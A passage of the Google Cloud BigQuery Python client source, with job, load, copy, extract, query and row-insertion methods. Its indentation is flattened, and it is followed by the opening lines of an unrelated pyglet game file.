:type resource: dict
:param resource: one job resource from API response
:rtype: One of:
:class:`google.cloud.bigquery.job.LoadJob`,
:class:`google.cloud.bigquery.job.CopyJob`,
:class:`google.cloud.bigquery.job.ExtractJob`,
or :class:`google.cloud.bigquery.job.QueryJob`
:returns: the job instance, constructed via the resource
"""
config = resource.get("configuration", {})
if "load" in config:
return job.LoadJob.from_api_repr(resource, self)
elif "copy" in config:
return job.CopyJob.from_api_repr(resource, self)
elif "extract" in config:
return job.ExtractJob.from_api_repr(resource, self)
elif "query" in config:
return job.QueryJob.from_api_repr(resource, self)
return job.UnknownJob.from_api_repr(resource, self)
def get_job(self, job_id, project=None, location=None, retry=DEFAULT_RETRY):
"""Fetch a job for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/get
Arguments:
job_id (str): Unique job identifier.
Keyword Arguments:
project (str):
(Optional) ID of the project which ownsthe job (defaults to
the client's project).
location (str): Location where the job was run.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
Union[google.cloud.bigquery.job.LoadJob, \
google.cloud.bigquery.job.CopyJob, \
google.cloud.bigquery.job.ExtractJob, \
google.cloud.bigquery.job.QueryJob]:
Job instance, based on the resource returned by the API.
"""
extra_params = {"projection": "full"}
if project is None:
project = self.project
if location is None:
location = self.location
if location is not None:
extra_params["location"] = location
path = "/projects/{}/jobs/{}".format(project, job_id)
resource = self._call_api(
retry, method="GET", path=path, query_params=extra_params
)
return self.job_from_resource(resource)
def cancel_job(self, job_id, project=None, location=None, retry=DEFAULT_RETRY):
"""Attempt to cancel a job from a job ID.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/cancel
Arguments:
job_id (str): Unique job identifier.
Keyword Arguments:
project (str):
(Optional) ID of the project which owns the job (defaults to
the client's project).
location (str): Location where the job was run.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
Union[google.cloud.bigquery.job.LoadJob, \
google.cloud.bigquery.job.CopyJob, \
google.cloud.bigquery.job.ExtractJob, \
google.cloud.bigquery.job.QueryJob]:
Job instance, based on the resource returned by the API.
"""
extra_params = {"projection": "full"}
if project is None:
project = self.project
if location is None:
location = self.location
if location is not None:
extra_params["location"] = location
path = "/projects/{}/jobs/{}/cancel".format(project, job_id)
resource = self._call_api(
retry, method="POST", path=path, query_params=extra_params
)
return self.job_from_resource(resource["job"])
def list_jobs(
self,
project=None,
max_results=None,
page_token=None,
all_users=None,
state_filter=None,
retry=DEFAULT_RETRY,
min_creation_time=None,
max_creation_time=None,
):
"""List jobs for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/list
Args:
project (str, optional):
Project ID to use for retreiving datasets. Defaults
to the client's project.
max_results (int, optional):
Maximum number of jobs to return.
page_token (str, optional):
Opaque marker for the next "page" of jobs. If not
passed, the API will return the first page of jobs. The token
marks the beginning of the iterator to be returned and the
value of the ``page_token`` can be accessed at
``next_page_token`` of
:class:`~google.api_core.page_iterator.HTTPIterator`.
all_users (bool, optional):
If true, include jobs owned by all users in the project.
Defaults to :data:`False`.
state_filter (str, optional):
If set, include only jobs matching the given state. One of:
* ``"done"``
* ``"pending"``
* ``"running"``
retry (google.api_core.retry.Retry, optional):
How to retry the RPC.
min_creation_time (datetime.datetime, optional):
Min value for job creation time. If set, only jobs created
after or at this timestamp are returned. If the datetime has
no time zone assumes UTC time.
max_creation_time (datetime.datetime, optional):
Max value for job creation time. If set, only jobs created
before or at this timestamp are returned. If the datetime has
no time zone assumes UTC time.
Returns:
google.api_core.page_iterator.Iterator:
Iterable of job instances.
"""
extra_params = {
"allUsers": all_users,
"stateFilter": state_filter,
"minCreationTime": _str_or_none(
google.cloud._helpers._millis_from_datetime(min_creation_time)
),
"maxCreationTime": _str_or_none(
google.cloud._helpers._millis_from_datetime(max_creation_time)
),
"projection": "full",
}
extra_params = {
param: value for param, value in extra_params.items() if value is not None
}
if project is None:
project = self.project
path = "/projects/%s/jobs" % (project,)
return page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_job,
items_key="jobs",
page_token=page_token,
max_results=max_results,
extra_params=extra_params,
)
def load_table_from_uri(
self,
source_uris,
destination,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
retry=DEFAULT_RETRY,
):
"""Starts a job for loading data into a table from CloudStorage.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.load
Arguments:
source_uris (Union[str, Sequence[str]]):
URIs of data files to be loaded; in format
``gs://<bucket_name>/<object_name_or_glob>``.
destination (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
Table into which data is to be loaded. If a string is passed
in, this method attempts to create a table reference from a
string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
Keyword Arguments:
job_id (str): (Optional) Name of the job.
job_id_prefix (str):
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
destination table.
project (str):
Project ID of the project of where to run the job. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.LoadJobConfig):
(Optional) Extra configuration options for the job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.job.LoadJob: A new load job.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
job_ref = job._JobReference(job_id, project=project, location=location)
if isinstance(source_uris, six.string_types):
source_uris = [source_uris]
destination = _table_arg_to_table_ref(destination, default_project=self.project)
load_job = job.LoadJob(job_ref, source_uris, destination, self, job_config)
load_job._begin(retry=retry)
return load_job
def load_table_from_file(
self,
file_obj,
destination,
rewind=False,
size=None,
num_retries=_DEFAULT_NUM_RETRIES,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
):
"""Upload the contents of this table from a file-like object.
Similar to :meth:`load_table_from_uri`, this method creates, starts and
returns a :class:`~google.cloud.bigquery.job.LoadJob`.
Arguments:
file_obj (file): A file handle opened in binary mode for reading.
destination (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
Table into which data is to be loaded. If a string is passed
in, this method attempts to create a table reference from a
string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
Keyword Arguments:
rewind (bool):
If True, seek to the beginning of the file handle before
reading the file.
size (int):
The number of bytes to read from the file handle. If size is
``None`` or large, resumable upload will be used. Otherwise,
multipart upload will be used.
num_retries (int): Number of upload retries. Defaults to 6.
job_id (str): (Optional) Name of the job.
job_id_prefix (str):
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
destination table.
project (str):
Project ID of the project of where to run the job. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.LoadJobConfig):
(Optional) Extra configuration options for the job.
Returns:
google.cloud.bigquery.job.LoadJob: A new load job.
Raises:
ValueError:
If ``size`` is not passed in and can not be determined, or if
the ``file_obj`` can be detected to be a file opened in text
mode.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
destination = _table_arg_to_table_ref(destination, default_project=self.project)
job_ref = job._JobReference(job_id, project=project, location=location)
load_job = job.LoadJob(job_ref, None, destination, self, job_config)
job_resource = load_job.to_api_repr()
if rewind:
file_obj.seek(0, os.SEEK_SET)
_check_mode(file_obj)
try:
if size is None or size >= _MAX_MULTIPART_SIZE:
response = self._do_resumable_upload(
file_obj, job_resource, num_retries
)
else:
response = self._do_multipart_upload(
file_obj, job_resource, size, num_retries
)
except resumable_media.InvalidResponse as exc:
raise exceptions.from_http_response(exc.response)
return self.job_from_resource(response.json())
def load_table_from_dataframe(
self,
dataframe,
destination,
num_retries=_DEFAULT_NUM_RETRIES,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
parquet_compression="snappy",
):
"""Upload the contents of a table from a pandas DataFrame.
Similar to :meth:`load_table_from_uri`, this method creates, starts and
returns a :class:`~google.cloud.bigquery.job.LoadJob`.
Arguments:
dataframe (pandas.DataFrame):
A :class:`~pandas.DataFrame` containing the data to load.
destination (google.cloud.bigquery.table.TableReference):
The destination table to use for loading the data. If it is an
existing table, the schema of the :class:`~pandas.DataFrame`
must match the schema of the destination table. If the table
does not yet exist, the schema is inferred from the
:class:`~pandas.DataFrame`.
If a string is passed in, this method attempts to create a
table reference from a string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
Keyword Arguments:
num_retries (int, optional): Number of upload retries.
job_id (str, optional): Name of the job.
job_id_prefix (str, optional):
The user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
destination table.
project (str, optional):
Project ID of the project of where to run the job. Defaults
to the client's project.
job_config (~google.cloud.bigquery.job.LoadJobConfig, optional):
Extra configuration options for the job.
To override the default pandas data type conversions, supply
a value for
:attr:`~google.cloud.bigquery.job.LoadJobConfig.schema` with
column names matching those of the dataframe. The BigQuery
schema is used to determine the correct data type conversion.
Indexes are not loaded. Requires the :mod:`pyarrow` library.
parquet_compression (str):
[Beta] The compression method to use if intermittently
serializing ``dataframe`` to a parquet file.
If ``pyarrow`` and job config schema are used, the argument
is directly passed as the ``compression`` argument to the
underlying ``pyarrow.parquet.write_table()`` method (the
default value "snappy" gets converted to uppercase).
https://arrow.apache.org/docs/python/generated/pyarrow.parquet.write_table.html#pyarrow-parquet-write-table
If either ``pyarrow`` or job config schema are missing, the
argument is directly passed as the ``compression`` argument
to the underlying ``DataFrame.to_parquet()`` method.
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.to_parquet.html#pandas.DataFrame.to_parquet
Returns:
google.cloud.bigquery.job.LoadJob: A new load job.
Raises:
ImportError:
If a usable parquet engine cannot be found. This method
requires :mod:`pyarrow` or :mod:`fastparquet` to be
installed.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if job_config is None:
job_config = job.LoadJobConfig()
job_config.source_format = job.SourceFormat.PARQUET
if location is None:
location = self.location
tmpfd, tmppath = tempfile.mkstemp(suffix="_job_{}.parquet".format(job_id[:8]))
os.close(tmpfd)
try:
if pyarrow and job_config.schema:
if parquet_compression == "snappy": # adjust the default value
parquet_compression = parquet_compression.upper()
_pandas_helpers.dataframe_to_parquet(
dataframe,
job_config.schema,
tmppath,
parquet_compression=parquet_compression,
)
else:
if job_config.schema:
warnings.warn(
"job_config.schema is set, but not used to assist in "
"identifying correct types for data serialization. "
"Please install the pyarrow package.",
PendingDeprecationWarning,
stacklevel=2,
)
dataframe.to_parquet(tmppath, compression=parquet_compression)
with open(tmppath, "rb") as parquet_file:
return self.load_table_from_file(
parquet_file,
destination,
num_retries=num_retries,
rewind=True,
job_id=job_id,
job_id_prefix=job_id_prefix,
location=location,
project=project,
job_config=job_config,
)
finally:
os.remove(tmppath)
def _do_resumable_upload(self, stream, metadata, num_retries):
"""Perform a resumable upload.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:type metadata: dict
:param metadata: The metadata associated with the upload.
:type num_retries: int
:param num_retries: Number of upload retries. (Deprecated: This
argument will be removed in a future release.)
:rtype: :class:`~requests.Response`
:returns: The "200 OK" response object returned after the final chunk
is uploaded.
"""
upload, transport = self._initiate_resumable_upload(
stream, metadata, num_retries
)
while not upload.finished:
response = upload.transmit_next_chunk(transport)
return response
def _initiate_resumable_upload(self, stream, metadata, num_retries):
"""Initiate a resumable upload.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:type metadata: dict
:param metadata: The metadata associated with the upload.
:type num_retries: int
:param num_retries: Number of upload retries. (Deprecated: This
argument will be removed in a future release.)
:rtype: tuple
:returns:
Pair of
* The :class:`~google.resumable_media.requests.ResumableUpload`
that was created
* The ``transport`` used to initiate the upload.
"""
chunk_size = _DEFAULT_CHUNKSIZE
transport = self._http
headers = _get_upload_headers(self._connection.user_agent)
upload_url = _RESUMABLE_URL_TEMPLATE.format(project=self.project)
# TODO: modify ResumableUpload to take a retry.Retry object
# that it can use for the initial RPC.
upload = ResumableUpload(upload_url, chunk_size, headers=headers)
if num_retries is not None:
upload._retry_strategy = resumable_media.RetryStrategy(
max_retries=num_retries
)
upload.initiate(
transport, stream, metadata, _GENERIC_CONTENT_TYPE, stream_final=False
)
return upload, transport
def _do_multipart_upload(self, stream, metadata, size, num_retries):
"""Perform a multipart upload.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:type metadata: dict
:param metadata: The metadata associated with the upload.
:type size: int
:param size: The number of bytes to be uploaded (which will be read
from ``stream``). If not provided, the upload will be
concluded once ``stream`` is exhausted (or :data:`None`).
:type num_retries: int
:param num_retries: Number of upload retries. (Deprecated: This
argument will be removed in a future release.)
:rtype: :class:`~requests.Response`
:returns: The "200 OK" response object returned after the multipart
upload request.
:raises: :exc:`ValueError` if the ``stream`` has fewer than ``size``
bytes remaining.
"""
data = stream.read(size)
if len(data) < size:
msg = _READ_LESS_THAN_SIZE.format(size, len(data))
raise ValueError(msg)
headers = _get_upload_headers(self._connection.user_agent)
upload_url = _MULTIPART_URL_TEMPLATE.format(project=self.project)
upload = MultipartUpload(upload_url, headers=headers)
if num_retries is not None:
upload._retry_strategy = resumable_media.RetryStrategy(
max_retries=num_retries
)
response = upload.transmit(self._http, data, metadata, _GENERIC_CONTENT_TYPE)
return response
def copy_table(
self,
sources,
destination,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
retry=DEFAULT_RETRY,
):
"""Copy one or more tables to another table.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.copy
Arguments:
sources (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
Sequence[ \
Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
] \
], \
]):
Table or tables to be copied.
destination (Union[
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
Table into which data is to be copied.
Keyword Arguments:
job_id (str): (Optional) The ID of the job.
job_id_prefix (str)
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of any
source table as well as the destination table.
project (str):
Project ID of the project of where to run the job. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.CopyJobConfig):
(Optional) Extra configuration options for the job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.job.CopyJob: A new copy job instance.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
job_ref = job._JobReference(job_id, project=project, location=location)
# sources can be one of many different input types. (string, Table,
# TableReference, or a sequence of any of those.) Convert them all to a
# list of TableReferences.
#
# _table_arg_to_table_ref leaves lists unmodified.
sources = _table_arg_to_table_ref(sources, default_project=self.project)
if not isinstance(sources, collections_abc.Sequence):
sources = [sources]
sources = [
_table_arg_to_table_ref(source, default_project=self.project)
for source in sources
]
destination = _table_arg_to_table_ref(destination, default_project=self.project)
copy_job = job.CopyJob(
job_ref, sources, destination, client=self, job_config=job_config
)
copy_job._begin(retry=retry)
return copy_job
def extract_table(
self,
source,
destination_uris,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
retry=DEFAULT_RETRY,
):
"""Start a job to extract a table into Cloud Storage files.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.extract
Arguments:
source (Union[ \
:class:`google.cloud.bigquery.table.Table`, \
:class:`google.cloud.bigquery.table.TableReference`, \
src, \
]):
Table to be extracted.
destination_uris (Union[str, Sequence[str]]):
URIs of Cloud Storage file(s) into which table data is to be
extracted; in format
``gs://<bucket_name>/<object_name_or_glob>``.
Keyword Arguments:
job_id (str): (Optional) The ID of the job.
job_id_prefix (str)
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
source table.
project (str):
Project ID of the project of where to run the job. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.ExtractJobConfig):
(Optional) Extra configuration options for the job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
:type source: :class:`google.cloud.bigquery.table.TableReference`
:param source: table to be extracted.
Returns:
google.cloud.bigquery.job.ExtractJob: A new extract job instance.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
job_ref = job._JobReference(job_id, project=project, location=location)
source = _table_arg_to_table_ref(source, default_project=self.project)
if isinstance(destination_uris, six.string_types):
destination_uris = [destination_uris]
extract_job = job.ExtractJob(
job_ref, source, destination_uris, client=self, job_config=job_config
)
extract_job._begin(retry=retry)
return extract_job
def query(
self,
query,
job_config=None,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
retry=DEFAULT_RETRY,
):
"""Run a SQL query.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.query
Arguments:
query (str):
SQL query to be executed. Defaults to the standard SQL
dialect. Use the ``job_config`` parameter to change dialects.
Keyword Arguments:
job_config (google.cloud.bigquery.job.QueryJobConfig):
(Optional) Extra configuration options for the job.
To override any options that were previously set in
the ``default_query_job_config`` given to the
``Client`` constructor, manually set those options to ``None``,
or whatever value is preferred.
job_id (str): (Optional) ID to use for the query job.
job_id_prefix (str):
(Optional) The prefix to use for a randomly generated job ID.
This parameter will be ignored if a ``job_id`` is also given.
location (str):
Location where to run the job. Must match the location of the
any table used in the query as well as the destination table.
project (str):
Project ID of the project of where to run the job. Defaults
to the client's project.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.job.QueryJob: A new query job instance.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
if self._default_query_job_config:
if job_config:
# anything that's not defined on the incoming
# that is in the default,
# should be filled in with the default
# the incoming therefore has precedence
job_config = job_config._fill_from_default(
self._default_query_job_config
)
else:
job_config = self._default_query_job_config
job_ref = job._JobReference(job_id, project=project, location=location)
query_job = job.QueryJob(job_ref, query, client=self, job_config=job_config)
query_job._begin(retry=retry)
return query_job
def insert_rows(self, table, rows, selected_fields=None, **kwargs):
"""Insert rows into a table via the streaming API.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/insertAll
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The destination table for the row data, or a reference to it.
rows (Union[ \
Sequence[Tuple], \
Sequence[dict], \
]):
Row data to be inserted. If a list of tuples is given, each
tuple should contain data for each schema field on the
current table and in the same order as the schema fields. If
a list of dictionaries is given, the keys must include all
required fields in the schema. Keys which do not correspond
to a field in the schema are ignored.
selected_fields (Sequence[ \
:class:`~google.cloud.bigquery.schema.SchemaField`, \
]):
The fields to return. Required if ``table`` is a
:class:`~google.cloud.bigquery.table.TableReference`.
kwargs (dict):
Keyword arguments to
:meth:`~google.cloud.bigquery.client.Client.insert_rows_json`.
Returns:
Sequence[Mappings]:
One mapping per row with insert errors: the "index" key
identifies the row, and the "errors" key contains a list of
the mappings describing one or more problems with the row.
Raises:
ValueError: if table's schema is not set
"""
table = _table_arg_to_table(table, default_project=self.project)
if not isinstance(table, Table):
raise TypeError(_NEED_TABLE_ARGUMENT)
schema = table.schema
# selected_fields can override the table schema.
if selected_fields is not None:
schema = selected_fields
if len(schema) == 0:
raise ValueError(
(
"Could not determine schema for table '{}'. Call client.get_table() "
"or pass in a list of schema fields to the selected_fields argument."
).format(table)
)
json_rows = [_record_field_to_json(schema, row) for row in rows]
return self.insert_rows_json(table, json_rows, **kwargs)
def insert_rows_json(
self,
table,
json_rows,
row_ids=None,
skip_invalid_rows=None,
ignore_unknown_values=None,
template_suffix=None,
retry=DEFAULT_RETRY,
):
"""Insert rows into a table without applying local type conversions.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/insertAll
table (Union[ \
:class:`~google.cloud.bigquery.table.Table` \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The destination table for the row data, or a reference to it.
json_rows (Sequence[dict]):
Row data to be inserted. Keys must match the table schema fields
and values must be JSON-compatible representations.
row_ids (Sequence[str]):
(Optional) Unique ids, one per row being inserted. If omitted,
unique IDs are created.
skip_invalid_rows (bool):
(Optional) Insert all valid rows of a request, even if invalid
rows exist. The default value is False, which causes the entire
request to fail if any invalid rows exist.
ignore_unknown_values (bool):
(Optional) Accept rows that contain values that do not match the
schema. The unknown values are ignored. Default is False, which
treats unknown values as errors.
template_suffix (str):
(Optional) treat ``name`` as a template table and provide a suffix.
BigQuery will create the table ``<name> + <template_suffix>`` based
on the schema of the template table. See
https://cloud.google.com/bigquery/streaming-data-into-bigquery#template-tables
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
Sequence[Mappings]:
One mapping per row with insert errors: the "index" key
identifies the row, and the "errors" key contains a list of
the mappings describing one or more problems with the row.
"""
# Convert table to just a reference because unlike insert_rows,
# insert_rows_json doesn't need the table schema. It's not doing any
# type conversions.
table = _table_arg_to_table_ref(table, default_project=self.project)
rows_info = []
data = {"rows": rows_info}
for index, row in enumerate(json_rows):
info = {"json": row}
if row_ids is not None:
info["insertId"] = row_ids[index]
else:
info["insertId"] = str(uuid.uuid4())
rows_info.append(info)
if skip_invalid_rows is not None:
data["skipInvalidRows"] = skip_invalid_rows
if ignore_unknown_values is not None:
data["ignoreUnknownValues"] = ignore_unknown_values
if template_suffix is not None:
data["templateSuffix"] = template_suffix
# We can always retry, because every row has an insert ID.
response = self._call_api(
retry, method="POST", path="%s/insertAll" % table.path, data=data
)
errors = []
for error in response.get("insertErrors", ()):
errors.append({"index": int(error["index"]), "errors": error["errors"]})
return errors
def list_partitions(self, table, retry=DEFAULT_RETRY):
"""List the partitions in a table.
Arguments:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The table or reference from which to get partition info
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
List[str]:
A list of the partition ids present in the partitioned table
"""
table = _table_arg_to_table_ref(table, default_project=self.project)
meta_table = self.get_table(
TableReference(
self.dataset(table.dataset_id, project=table.project),
"%s$__PARTITIONS_SUMMARY__" % table.table_id,
)
)
subset = [col for col in meta_table.schema if col.name == "partition_id"]
return [
row[0]
for row in self.list_rows(meta_table, selected_fields=subset, retry=retry)
]
def list_rows(
self,
table,
selected_fields=None,
max_results=None,
page_token=None,
start_index=None,
page_size=None,
retry=DEFAULT_RETRY,
):
"""List the rows of the table.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/list
.. note::
This method assumes that the provided schema is up-to-date with the
schema as defined on the back-end: if the two schemas are not
identical, the values returned may be incomplete. To ensure that the
local copy of the schema is up-to-date, call ``client.get_table``.
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableListItem`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The table to list, or a reference to it. When the table
object does not contain a schema and ``selected_fields`` is
not supplied, this method calls ``get_table`` to fetch the
table schema.
selected_fields (Sequence[ \
:class:`~google.cloud.bigquery.schema.SchemaField` \
]):
The fields to return. If not supplied, data for all columns
are downloaded.
max_results (int):
(Optional) maximum number of rows to return.
page_token (str):
(Optional) Token representing a cursor into the table's rows.
If not passed, the API will return the first page of the
rows. The token marks the beginning of the iterator to be
returned and the value of the ``page_token`` can be accessed
at ``next_page_token`` of the
:class:`~google.cloud.bigquery.table.RowIterator`.
start_index (int):
(Optional) The zero-based index of the starting row to read.
page_size (int):
Optional. The maximum number of rows in each page of results
from this request. Non-positive values are ignored. Defaults
to a sensible value set by the API.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.table.RowIterator:
Iterator of row data
:class:`~google.cloud.bigquery.table.Row`-s. During each
page, the iterator will have the ``total_rows`` attribute
set, which counts the total number of rows **in the table**
(this is distinct from the total number of rows in the
current page: ``iterator.page.num_items``).
"""
table = _table_arg_to_table(table, default_project=self.project)
if not isinstance(table, Table):
raise TypeError(_NEED_TABLE_ARGUMENT)
schema = table.schema
# selected_fields can override the table schema.
if selected_fields is not None:
schema = selected_fields
# No schema, but no selected_fields. Assume the developer wants all
# columns, so get the table resource for them rather than failing.
elif len(schema) == 0:
table = self.get_table(table.reference, retry=retry)
schema = table.schema
params = {}
if selected_fields is not None:
params["selectedFields"] = ",".join(field.name for field in selected_fields)
if start_index is not None:
params["startIndex"] = start_index
row_iterator = RowIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path="%s/data" % (table.path,),
schema=schema,
page_token=page_token,
max_results=max_results,
page_size=page_size,
extra_params=params,
table=table,
# Pass in selected_fields separately from schema so that full
# tables can be fetched without a column filter.
selected_fields=selected_fields,
)
return row_iterator
def _schema_from_json_file_object(self, file_obj):
"""Helper function for schema_from_json that takes a
file object that describes a table schema.
Returns:
List of schema field objects.
"""
json_data = json.load(file_obj)
return [SchemaField.from_api_repr(field) for field in json_data]
def _schema_to_json_file_object(self, schema_list, file_obj):
"""Helper function for schema_to_json that takes a schema list and file
object and writes the schema list to the file object with json.dump
"""
json.dump(schema_list, file_obj, indent=2, sort_keys=True)
def schema_from_json(self, file_or_path):
"""Takes a file object or file path that contains json that describes
a table schema.
Returns:
List of schema field objects.
"""
if isinstance(file_or_path, io.IOBase):
return self._schema_from_json_file_object(file_or_path)
with open(file_or_path) as file_obj:
return self._schema_from_json_file_object(file_obj)
def schema_to_json(self, schema_list, destination):
"""Takes a list of schema field objects.
Serializes the list of schema field objects as json to a file.
Destination is a file path or a file object.
"""
json_schema_list = [f.to_api_repr() for f in schema_list]
if isinstance(destination, io.IOBase):
return self._schema_to_json_file_object(json_schema_list, destination)
with open(destination, mode="w") as file_obj:
return self._schema_to_json_file_object(json_schema_list, file_obj)
# pylint: disable=unused-argument
def _item_to_project(iterator, resource):
"""Convert a JSON project to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a project.
:rtype: :class:`.Project`
:returns: The next project in the page.
"""
return Project.from_api_repr(resource)
# pylint: enable=unused-argument
def _item_to_dataset(iterator, resource):
"""Convert a JSON dataset to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a dataset.
:rtype: :class:`.DatasetListItem`
:returns: The next dataset in the page.
"""
return DatasetListItem(resource)
def _item_to_job(iterator, resource):
"""Convert a JSON job to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a job.
:rtype: job instance.
:returns: The next job in the page.
"""
return iterator.client.job_from_resource(resource)
def _item_to_model(iterator, resource):
"""Convert a JSON model to the native object.
Args:
iterator (google.api_core.page_iterator.Iterator):
The iterator that is currently in use.
resource (dict):
An item to be converted to a model.
Returns:
google.cloud.bigquery.model.Model: The next model in the page.
"""
return Model.from_api_repr(resource)
def _item_to_routine(iterator, resource):
"""Convert a JSON model to the native object.
Args:
iterator (google.api_core.page_iterator.Iterator):
The iterator that is currently in use.
resource (dict):
An item to be converted to a routine.
Returns:
google.cloud.bigquery.routine.Routine: The next routine in the page.
"""
return Routine.from_api_repr(resource)
def _item_to_table(iterator, resource):
"""Convert a JSON table to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a table.
:rtype: :class:`~google.cloud.bigquery.table.Table`
:returns: The next table in the page.
"""
return TableListItem(resource)
def _make_job_id(job_id, prefix=None):
"""Construct an ID for a new job.
:type job_id: str or ``NoneType``
:param job_id: the user-provided job ID
:type prefix: str or ``NoneType``
:param prefix: (Optional) the user-provided prefix for a job ID
:rtype: str
:returns: A job ID
"""
if job_id is not None:
return job_id
elif prefix is not None:
return str(prefix) + str(uuid.uuid4())
else:
return str(uuid.uuid4())
def _check_mode(stream):
"""Check that a stream was opened in read-binary mode.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:raises: :exc:`ValueError` if the ``stream.mode`` is a valid attribute
and is not among ``rb``, ``r+b`` or ``rb+``.
"""
mode = getattr(stream, "mode", None)
if isinstance(stream, gzip.GzipFile):
if mode != gzip.READ:
raise ValueError(
"Cannot upload gzip files opened in write mode: use "
"gzip.GzipFile(filename, mode='rb')"
)
else:
if mode is not None and mode not in ("rb", "r+b", "rb+"):
raise ValueError(
"Cannot upload files opened in text mode: use "
"open(filename, mode='rb') or open(filename, mode='r+b')"
)
def _get_upload_headers(user_agent):
"""Get the headers for an upload request.
:type user_agent: str
:param user_agent: The user-agent for requests.
:rtype: dict
:returns: The headers to be used for the request.
"""
return {
"Accept": "application/json",
"Accept-Encoding": "gzip, deflate",
"User-Agent": user_agent,
"content-type": "application/json",
}
|
the-stack_106_16857
|
import pyglet # noqa
from pyglet.gl import * # noqa
from collections import OrderedDict # noqa
from time import time # noqa
from os.path import abspath # noqa
from pyglet.window import key # noqa
import cProfile # noqa
import pstats # noqa
import StringIO # noqa
from time import time, sleep # noqa
from utility import window_height, window_width
from states import StateManager
class Game(pyglet.window.Window):
def __init__(self, height, width):
super(Game, self).__init__(width, height, caption='Acceptable Loss')
